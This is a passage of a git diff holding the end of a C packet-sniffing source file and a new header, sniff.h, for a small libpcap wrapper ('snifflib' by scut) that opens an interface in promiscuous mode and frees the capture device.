151sniff_pcap_open (char *device)
152{
153 char errorbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
154 pcap_t *pdes = NULL; /* packet capture descriptor */
155
156 pdes = pcap_open_live (device, SNAPLEN, PROMISC, READ_TIMEOUT, errorbuf);
157
158 if (pdes == NULL) {
159 printf ("[phx] sniff_pcap_open (pcap_open_live): %s\n", errorbuf);
160 return (NULL);
161 }
162
163 return (pdes);
164}
165
166/* sniff_dev_free
167 *
168 * close and free a sniffing device
169 */
170
171void
172sniff_dev_free (s_dev *device)
173{
174 pcap_close (device->pd);
175 if (device->interface)
176 free (device->interface);
177
178 free (device);
179
180 return;
181}
182
diff --git a/other/3wahas/sniff.h b/other/3wahas/sniff.h
new file mode 100644
index 0000000..af8fc77
--- /dev/null
+++ b/other/3wahas/sniff.h
@@ -0,0 +1,41 @@
1/* snifflib
2 *
3 * by scut
4 *
5 */
6
7#ifndef Z_SNIFF_H
8#define Z_SNIFF_H
9
10#include <pcap.h>
11#include "packet.h"
12
13#define SNAPLEN 65535
14#define PROMISC 1
15#define READ_TIMEOUT 0
16
17typedef struct s_dev {
18 int error; /* error flag */
19
20 pcap_t *pd; /* packet capture descriptor */
21 char *interface; /* interface name */
22 int linktype; /* link layer type */
23 unsigned long int linkhdrlen; /* length of the link layer frame header */
24 bpf_u_int32 localnet; /* local network address */
25 bpf_u_int32 netmask; /* netmask of local network */
26
27} s_dev;
28
29typedef struct sniff_info {
30 s_dev *device; /* device structure of the sniffing device */
31 struct in_addr ip_dst;
32} sniff_info;
33
34void sniff_new (char *interface, char *ip_dst);
35void *sniff_handle (sniff_info *sinfo);
36s_dev *sniff_open (char *devname);
37pcap_t *sniff_pcap_open (char *device);
38void sniff_dev_free (s_dev *device);
39
40#endif
41